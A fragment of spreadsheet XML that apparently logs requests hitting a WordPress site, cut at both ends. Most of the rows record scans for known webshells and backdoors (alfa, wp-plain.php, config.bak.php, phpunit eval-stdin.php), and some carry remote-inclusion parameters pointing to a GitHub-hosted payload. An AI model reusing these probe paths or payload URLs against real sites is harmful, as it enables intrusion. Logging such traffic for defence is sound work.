        <v>45111.48709490741</v>
      </c>
      <c r="B5527" t="s">
        <v>1887</v>
      </c>
      <c r="C5527" t="s">
        <v>43</v>
      </c>
      <c r="D5527" t="str">
        <f t="shared" si="86"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5527" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5528" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5528" s="1">
        <v>45111.487071759257</v>
      </c>
      <c r="B5528" t="s">
        <v>1887</v>
      </c>
      <c r="C5528" t="s">
        <v>1889</v>
      </c>
      <c r="D5528" t="str">
        <f t="shared" si="86"/>
        <v>tuybwomh.php?Fox=d3wL7</v>
      </c>
      <c r="E5528" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5529" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5529" s="1">
        <v>45111.487060185187</v>
      </c>
      <c r="B5529" t="s">
        <v>1887</v>
      </c>
      <c r="C5529" t="s">
        <v>43</v>
      </c>
      <c r="D5529" t="str">
        <f t="shared" si="86"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5529" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5530" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5530" s="1">
        <v>45111.487060185187</v>
      </c>
      <c r="B5530" t="s">
        <v>1887</v>
      </c>
      <c r="C5530" t="s">
        <v>41</v>
      </c>
      <c r="D5530" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5530" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5531" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5531" s="1">
        <v>45111.487060185187</v>
      </c>
      <c r="B5531" t="s">
        <v>1887</v>
      </c>
      <c r="C5531" t="s">
        <v>45</v>
      </c>
      <c r="D5531" t="str">
        <f t="shared" si="86"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5531" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5532" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5532" s="1">
        <v>45111.48704861111</v>
      </c>
      <c r="B5532" t="s">
        <v>1887</v>
      </c>
      <c r="C5532" t="s">
        <v>46</v>
      </c>
      <c r="D5532" t="str">
        <f t="shared" si="86"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5532" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5533" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5533" s="1">
        <v>45110.202048611114</v>
      </c>
      <c r="B5533" t="s">
        <v>1890</v>
      </c>
      <c r="C5533" t="s">
        <v>1891</v>
      </c>
      <c r="D5533" t="str">
        <f t="shared" si="86"/>
        <v>rindex.php?action=add</v>
      </c>
      <c r="E5533" t="s">
        <v>1892</v>
      </c>
    </row>
    <row r="5534" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5534" s="1">
        <v>45110.141770833332</v>
      </c>
      <c r="B5534" t="s">
        <v>1882</v>
      </c>
      <c r="C5534" t="s">
        <v>1893</v>
      </c>
      <c r="D5534" t="str">
        <f t="shared" si="86"/>
        <v>wp-includes/blocks/post-title/post-title/?of=1</v>
      </c>
      <c r="E5534" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5535" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5535" s="1">
        <v>45110.103449074071</v>
      </c>
      <c r="B5535" t="s">
        <v>1894</v>
      </c>
      <c r="C5535" t="s">
        <v>5</v>
      </c>
      <c r="D5535" t="str">
        <f t="shared" si="86"/>
        <v/>
      </c>
      <c r="E5535" t="s">
        <v>1895</v>
      </c>
    </row>
    <row r="5536" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5536" s="1">
        <v>45109.361666666664</v>
      </c>
      <c r="B5536" t="s">
        <v>1882</v>
      </c>
      <c r="C5536" t="s">
        <v>1893</v>
      </c>
      <c r="D5536" t="str">
        <f t="shared" si="86"/>
        <v>wp-includes/blocks/post-title/post-title/?of=1</v>
      </c>
      <c r="E5536" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5537" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5537" s="1">
        <v>45108.917858796296</v>
      </c>
      <c r="B5537" t="s">
        <v>1896</v>
      </c>
      <c r="C5537" t="s">
        <v>1897</v>
      </c>
      <c r="D5537" t="str">
        <f t="shared" si="86"/>
        <v>tag/mumbai-model/</v>
      </c>
      <c r="E5537" t="s">
        <v>1898</v>
      </c>
    </row>
    <row r="5538" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5538" s="1">
        <v>45108.381932870368</v>
      </c>
      <c r="B5538" t="s">
        <v>1899</v>
      </c>
      <c r="C5538" t="s">
        <v>5</v>
      </c>
      <c r="D5538" t="str">
        <f t="shared" si="86"/>
        <v/>
      </c>
      <c r="E5538" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="5539" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5539" s="1">
        <v>45108.077418981484</v>
      </c>
      <c r="B5539" t="s">
        <v>1900</v>
      </c>
      <c r="C5539" t="s">
        <v>45</v>
      </c>
      <c r="D5539" t="str">
        <f t="shared" si="86"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5539" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5540" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5540" s="1">
        <v>45108.077407407407</v>
      </c>
      <c r="B5540" t="s">
        <v>1900</v>
      </c>
      <c r="C5540" t="s">
        <v>43</v>
      </c>
      <c r="D5540" t="str">
        <f t="shared" si="86"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5540" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5541" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5541" s="1">
        <v>45108.077361111114</v>
      </c>
      <c r="B5541" t="s">
        <v>1900</v>
      </c>
      <c r="C5541" t="s">
        <v>46</v>
      </c>
      <c r="D5541" t="str">
        <f t="shared" si="86"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5541" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5542" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5542" s="1">
        <v>45108.077361111114</v>
      </c>
      <c r="B5542" t="s">
        <v>1900</v>
      </c>
      <c r="C5542" t="s">
        <v>43</v>
      </c>
      <c r="D5542" t="str">
        <f t="shared" si="86"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5542" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5543" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5543" s="1">
        <v>45107.375659722224</v>
      </c>
      <c r="B5543" t="s">
        <v>1901</v>
      </c>
      <c r="C5543" t="s">
        <v>1813</v>
      </c>
      <c r="D5543" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/plugins/wpdiscuz/themes/default/style-rtl.css</v>
      </c>
      <c r="E5543" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5544" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5544" s="1">
        <v>45107.375601851854</v>
      </c>
      <c r="B5544" t="s">
        <v>1901</v>
      </c>
      <c r="C5544" t="s">
        <v>1815</v>
      </c>
      <c r="D5544" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php</v>
      </c>
      <c r="E5544" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5545" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5545" s="1">
        <v>45107.375289351854</v>
      </c>
      <c r="B5545" t="s">
        <v>1901</v>
      </c>
      <c r="C5545" t="s">
        <v>1816</v>
      </c>
      <c r="D5545" t="str">
        <f t="shared" si="86"/>
        <v>vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</v>
      </c>
      <c r="E5545" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5546" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5546" s="1">
        <v>45107.374837962961</v>
      </c>
      <c r="B5546" t="s">
        <v>1901</v>
      </c>
      <c r="C5546" t="s">
        <v>1852</v>
      </c>
      <c r="D5546" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/langar.php</v>
      </c>
      <c r="E5546" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5547" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5547" s="1">
        <v>45107.374409722222</v>
      </c>
      <c r="B5547" t="s">
        <v>1901</v>
      </c>
      <c r="C5547" t="s">
        <v>1818</v>
      </c>
      <c r="D5547" t="str">
        <f t="shared" si="86"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5547" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5548" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5548" s="1">
        <v>45107.374328703707</v>
      </c>
      <c r="B5548" t="s">
        <v>1901</v>
      </c>
      <c r="C5548" t="s">
        <v>1817</v>
      </c>
      <c r="D5548" t="str">
        <f t="shared" si="86"/>
        <v>upload.php</v>
      </c>
      <c r="E5548" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5549" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5549" s="1">
        <v>45107.374282407407</v>
      </c>
      <c r="B5549" t="s">
        <v>1901</v>
      </c>
      <c r="C5549" t="s">
        <v>1818</v>
      </c>
      <c r="D5549" t="str">
        <f t="shared" si="86"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5549" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5550" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5550" s="1">
        <v>45107.374212962961</v>
      </c>
      <c r="B5550" t="s">
        <v>1901</v>
      </c>
      <c r="C5550" t="s">
        <v>887</v>
      </c>
      <c r="D5550" t="str">
        <f t="shared" si="86"/>
        <v>upload.php</v>
      </c>
      <c r="E5550" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5551" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5551" s="1">
        <v>45107.373969907407</v>
      </c>
      <c r="B5551" t="s">
        <v>1901</v>
      </c>
      <c r="C5551" t="s">
        <v>1818</v>
      </c>
      <c r="D5551" t="str">
        <f t="shared" si="86"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5551" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5552" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5552" s="1">
        <v>45107.373726851853</v>
      </c>
      <c r="B5552" t="s">
        <v>1901</v>
      </c>
      <c r="C5552" t="s">
        <v>887</v>
      </c>
      <c r="D5552" t="str">
        <f t="shared" si="86"/>
        <v>upload.php</v>
      </c>
      <c r="E5552" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5553" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5553" s="1">
        <v>45107.373703703706</v>
      </c>
      <c r="B5553" t="s">
        <v>1901</v>
      </c>
      <c r="C5553" t="s">
        <v>887</v>
      </c>
      <c r="D5553" t="str">
        <f t="shared" si="86"/>
        <v>upload.php</v>
      </c>
      <c r="E5553" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5554" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5554" s="1">
        <v>45107.373564814814</v>
      </c>
      <c r="B5554" t="s">
        <v>1901</v>
      </c>
      <c r="C5554" t="s">
        <v>888</v>
      </c>
      <c r="D5554" t="str">
        <f t="shared" si="86"/>
        <v>up.php</v>
      </c>
      <c r="E5554" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5555" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5555" s="1">
        <v>45107.373472222222</v>
      </c>
      <c r="B5555" t="s">
        <v>1901</v>
      </c>
      <c r="C5555" t="s">
        <v>937</v>
      </c>
      <c r="D5555" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/mu-plugins/db-safe-mode.php</v>
      </c>
      <c r="E5555" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5556" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5556" s="1">
        <v>45107.373182870368</v>
      </c>
      <c r="B5556" t="s">
        <v>1901</v>
      </c>
      <c r="C5556" t="s">
        <v>934</v>
      </c>
      <c r="D5556" t="str">
        <f t="shared" si="86"/>
        <v>legion.php</v>
      </c>
      <c r="E5556" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5557" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5557" s="1">
        <v>45107.372986111113</v>
      </c>
      <c r="B5557" t="s">
        <v>1901</v>
      </c>
      <c r="C5557" t="s">
        <v>1819</v>
      </c>
      <c r="D5557" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/wp-old-index.php?action=login&amp;pass=-1&amp;submit=</v>
      </c>
      <c r="E5557" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5558" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5558" s="1">
        <v>45107.372916666667</v>
      </c>
      <c r="B5558" t="s">
        <v>1901</v>
      </c>
      <c r="C5558" t="s">
        <v>1820</v>
      </c>
      <c r="D5558" t="str">
        <f t="shared" si="86"/>
        <v>haders.php</v>
      </c>
      <c r="E5558" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5559" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5559" s="1">
        <v>45107.372858796298</v>
      </c>
      <c r="B5559" t="s">
        <v>1901</v>
      </c>
      <c r="C5559" t="s">
        <v>933</v>
      </c>
      <c r="D5559" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/plugins/wpconfig.bak.php?act=sf</v>
      </c>
      <c r="E5559" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5560" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5560" s="1">
        <v>45107.372372685182</v>
      </c>
      <c r="B5560" t="s">
        <v>1901</v>
      </c>
      <c r="C5560" t="s">
        <v>895</v>
      </c>
      <c r="D5560" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/plugins/ubh/up.php</v>
      </c>
      <c r="E5560" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5561" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5561" s="1">
        <v>45107.372303240743</v>
      </c>
      <c r="B5561" t="s">
        <v>1901</v>
      </c>
      <c r="C5561" t="s">
        <v>1821</v>
      </c>
      <c r="D5561" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/plugins/config.bak.php</v>
      </c>
      <c r="E5561" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5562" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5562" s="1">
        <v>45107.371898148151</v>
      </c>
      <c r="B5562" t="s">
        <v>1901</v>
      </c>
      <c r="C5562" t="s">
        <v>935</v>
      </c>
      <c r="D5562" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/themes/config.bak.php</v>
      </c>
      <c r="E5562" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5563" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5563" s="1">
        <v>45107.371759259258</v>
      </c>
      <c r="B5563" t="s">
        <v>1901</v>
      </c>
      <c r="C5563" t="s">
        <v>1853</v>
      </c>
      <c r="D5563" t="str">
        <f t="shared" si="86"/>
        <v>wp-content/config.bak.php</v>
      </c>
      <c r="E5563" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5564" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5564" s="1">
        <v>45107.371620370373</v>
      </c>
      <c r="B5564" t="s">
        <v>1901</v>
      </c>
      <c r="C5564" t="s">
        <v>1822</v>
      </c>
      <c r="D5564" t="str">
        <f t="shared" si="86"/>
        <v>wp-admin/config.bak.php</v>
      </c>
      <c r="E5564" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5565" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5565" s="1">
        <v>45107.371574074074</v>
      </c>
      <c r="B5565" t="s">
        <v>1901</v>
      </c>
      <c r="C5565" t="s">
        <v>936</v>
      </c>
      <c r="D5565" t="str">
        <f t="shared" si="86"/>
        <v>config.bak.php</v>
      </c>
      <c r="E5565" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5566" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5566" s="1">
        <v>45107.371504629627</v>
      </c>
      <c r="B5566" t="s">
        <v>1901</v>
      </c>
      <c r="C5566" t="s">
        <v>1823</v>
      </c>
      <c r="D5566" t="str">
        <f t="shared" si="86"/>
        <v>old-index.php</v>
      </c>
      <c r="E5566" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5567" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5567" s="1">
        <v>45107.371458333335</v>
      </c>
      <c r="B5567" t="s">
        <v>1901</v>
      </c>
      <c r="C5567" t="s">
        <v>943</v>
      </c>
      <c r="D5567" t="str">
        <f t="shared" si="86"/>
        <v>wp-includes/css/css.php</v>
      </c>
      <c r="E5567" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5568" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5568" s="1">
        <v>45107.371423611112</v>
      </c>
      <c r="B5568" t="s">
        <v>1901</v>
      </c>
      <c r="C5568" t="s">
        <v>1824</v>
      </c>
      <c r="D5568" t="str">
        <f t="shared" si="86"/>
        <v>wp-includes/fonts/css.php</v>
      </c>
      <c r="E5568" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5569" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5569" s="1">
        <v>45107.371388888889</v>
      </c>
      <c r="B5569" t="s">
        <v>1901</v>
      </c>
      <c r="C5569" t="s">
        <v>1825</v>
      </c>
      <c r="D5569" t="str">
        <f t="shared" si="86"/>
        <v>wp-1ogin_bak.php</v>
      </c>
      <c r="E5569" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5570" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5570" s="1">
        <v>45107.371215277781</v>
      </c>
      <c r="B5570" t="s">
        <v>1901</v>
      </c>
      <c r="C5570" t="s">
        <v>1826</v>
      </c>
      <c r="D5570" t="str">
        <f t="shared" ref="D5570:D5633" si="87">MID(C5570,FIND("#", SUBSTITUTE(C5570, "/", "#", 3))+1,LEN(C5570)-FIND("#", SUBSTITUTE(C5570, "/", "#", 3))+1)</f>
        <v>wp-content/wp-1ogin_bak.php</v>
      </c>
      <c r="E5570" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5571" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5571" s="1">
        <v>45107.371157407404</v>
      </c>
      <c r="B5571" t="s">
        <v>1901</v>
      </c>
      <c r="C5571" t="s">
        <v>1827</v>
      </c>
      <c r="D5571" t="str">
        <f t="shared" si="87"/>
        <v>cindex.php</v>
      </c>
      <c r="E5571" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5572" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5572" s="1">
        <v>45107.371064814812</v>
      </c>
      <c r="B5572" t="s">
        <v>1901</v>
      </c>
      <c r="C5572" t="s">
        <v>939</v>
      </c>
      <c r="D5572" t="str">
        <f t="shared" si="87"/>
        <v>wp-booking.php</v>
      </c>
      <c r="E5572" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5573" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5573" s="1">
        <v>45107.370856481481</v>
      </c>
      <c r="B5573" t="s">
        <v>1901</v>
      </c>
      <c r="C5573" t="s">
        <v>879</v>
      </c>
      <c r="D5573" t="str">
        <f t="shared" si="87"/>
        <v>alfa.php</v>
      </c>
      <c r="E5573" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5574" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5574" s="1">
        <v>45107.370682870373</v>
      </c>
      <c r="B5574" t="s">
        <v>1901</v>
      </c>
      <c r="C5574" t="s">
        <v>1828</v>
      </c>
      <c r="D5574" t="str">
        <f t="shared" si="87"/>
        <v>alfindex.php</v>
      </c>
      <c r="E5574" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5575" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5575" s="1">
        <v>45107.37060185185</v>
      </c>
      <c r="B5575" t="s">
        <v>1901</v>
      </c>
      <c r="C5575" t="s">
        <v>1829</v>
      </c>
      <c r="D5575" t="str">
        <f t="shared" si="87"/>
        <v>th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5575" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5576" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5576" s="1">
        <v>45107.370439814818</v>
      </c>
      <c r="B5576" t="s">
        <v>1901</v>
      </c>
      <c r="C5576" t="s">
        <v>1830</v>
      </c>
      <c r="D5576" t="str">
        <f t="shared" si="87"/>
        <v>larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5576" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5577" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5577" s="1">
        <v>45107.370335648149</v>
      </c>
      <c r="B5577" t="s">
        <v>1901</v>
      </c>
      <c r="C5577" t="s">
        <v>1831</v>
      </c>
      <c r="D5577" t="str">
        <f t="shared" si="87"/>
        <v>wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5577" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5578" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5578" s="1">
        <v>45107.370300925926</v>
      </c>
      <c r="B5578" t="s">
        <v>1901</v>
      </c>
      <c r="C5578" t="s">
        <v>1854</v>
      </c>
      <c r="D5578" t="str">
        <f t="shared" si="87"/>
        <v>xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5578" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5579" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5579" s="1">
        <v>45107.370243055557</v>
      </c>
      <c r="B5579" t="s">
        <v>1901</v>
      </c>
      <c r="C5579" t="s">
        <v>1832</v>
      </c>
      <c r="D5579" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/plugins/ioptimization/IOptimize.php?rchk</v>
      </c>
      <c r="E5579" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5580" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5580" s="1">
        <v>45107.370081018518</v>
      </c>
      <c r="B5580" t="s">
        <v>1901</v>
      </c>
      <c r="C5580" t="s">
        <v>1833</v>
      </c>
      <c r="D5580" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/db_cache.php</v>
      </c>
      <c r="E5580" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5581" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5581" s="1">
        <v>45107.369687500002</v>
      </c>
      <c r="B5581" t="s">
        <v>1901</v>
      </c>
      <c r="C5581" t="s">
        <v>938</v>
      </c>
      <c r="D5581" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/plugins/backup_index.php</v>
      </c>
      <c r="E5581" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5582" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5582" s="1">
        <v>45107.369583333333</v>
      </c>
      <c r="B5582" t="s">
        <v>1901</v>
      </c>
      <c r="C5582" t="s">
        <v>1834</v>
      </c>
      <c r="D5582" t="str">
        <f t="shared" si="87"/>
        <v>boom.php?x</v>
      </c>
      <c r="E5582" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5583" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5583" s="1">
        <v>45107.369467592594</v>
      </c>
      <c r="B5583" t="s">
        <v>1901</v>
      </c>
      <c r="C5583" t="s">
        <v>894</v>
      </c>
      <c r="D5583" t="str">
        <f t="shared" si="87"/>
        <v>?3x=3x</v>
      </c>
      <c r="E5583" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5584" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5584" s="1">
        <v>45107.369386574072</v>
      </c>
      <c r="B5584" t="s">
        <v>1901</v>
      </c>
      <c r="C5584" t="s">
        <v>392</v>
      </c>
      <c r="D5584" t="str">
        <f t="shared" si="87"/>
        <v>admin.php</v>
      </c>
      <c r="E5584" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5585" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5585" s="1">
        <v>45107.369340277779</v>
      </c>
      <c r="B5585" t="s">
        <v>1901</v>
      </c>
      <c r="C5585" t="s">
        <v>1322</v>
      </c>
      <c r="D5585" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/plugins/t_file_wp/t_file_wp.php?test=hello</v>
      </c>
      <c r="E5585" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5586" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5586" s="1">
        <v>45107.369293981479</v>
      </c>
      <c r="B5586" t="s">
        <v>1901</v>
      </c>
      <c r="C5586" t="s">
        <v>940</v>
      </c>
      <c r="D5586" t="str">
        <f t="shared" si="87"/>
        <v>moduless.php</v>
      </c>
      <c r="E5586" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5587" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5587" s="1">
        <v>45107.369189814817</v>
      </c>
      <c r="B5587" t="s">
        <v>1901</v>
      </c>
      <c r="C5587" t="s">
        <v>230</v>
      </c>
      <c r="D5587" t="str">
        <f t="shared" si="87"/>
        <v>style.php</v>
      </c>
      <c r="E5587" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5588" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5588" s="1">
        <v>45107.255115740743</v>
      </c>
      <c r="B5588" t="s">
        <v>1902</v>
      </c>
      <c r="C5588" t="s">
        <v>1903</v>
      </c>
      <c r="D5588" t="str">
        <f t="shared" si="87"/>
        <v>yvyfoaee.php?Fox=d3wL7</v>
      </c>
      <c r="E5588" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5589" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5589" s="1">
        <v>45107.255069444444</v>
      </c>
      <c r="B5589" t="s">
        <v>1902</v>
      </c>
      <c r="C5589" t="s">
        <v>43</v>
      </c>
      <c r="D5589" t="str">
        <f t="shared" si="87"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5589" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5590" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5590" s="1">
        <v>45107.255057870374</v>
      </c>
      <c r="B5590" t="s">
        <v>1902</v>
      </c>
      <c r="C5590" t="s">
        <v>41</v>
      </c>
      <c r="D5590" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5590" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5591" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5591" s="1">
        <v>45107.255023148151</v>
      </c>
      <c r="B5591" t="s">
        <v>1902</v>
      </c>
      <c r="C5591" t="s">
        <v>1904</v>
      </c>
      <c r="D5591" t="str">
        <f t="shared" si="87"/>
        <v>htufwvii.php?Fox=d3wL7</v>
      </c>
      <c r="E5591" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5592" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5592" s="1">
        <v>45107.255011574074</v>
      </c>
      <c r="B5592" t="s">
        <v>1902</v>
      </c>
      <c r="C5592" t="s">
        <v>45</v>
      </c>
      <c r="D5592" t="str">
        <f t="shared" si="87"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5592" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5593" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5593" s="1">
        <v>45107.254999999997</v>
      </c>
      <c r="B5593" t="s">
        <v>1902</v>
      </c>
      <c r="C5593" t="s">
        <v>41</v>
      </c>
      <c r="D5593" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5593" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5594" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5594" s="1">
        <v>45107.254988425928</v>
      </c>
      <c r="B5594" t="s">
        <v>1902</v>
      </c>
      <c r="C5594" t="s">
        <v>46</v>
      </c>
      <c r="D5594" t="str">
        <f t="shared" si="87"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5594" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5595" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5595" s="1">
        <v>45107.254988425928</v>
      </c>
      <c r="B5595" t="s">
        <v>1902</v>
      </c>
      <c r="C5595" t="s">
        <v>43</v>
      </c>
      <c r="D5595" t="str">
        <f t="shared" si="87"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5595" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5596" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5596" s="1">
        <v>45106.722094907411</v>
      </c>
      <c r="B5596" t="s">
        <v>1905</v>
      </c>
      <c r="C5596" t="s">
        <v>1813</v>
      </c>
      <c r="D5596" t="str">
        <f t="shared" si="87"/>
        <v>wp-content/plugins/wpdiscuz/themes/default/style-rtl.css</v>
      </c>
      <c r="E5596" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5597" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5597" s="1">
        <v>45106.722037037034</v>
      </c>
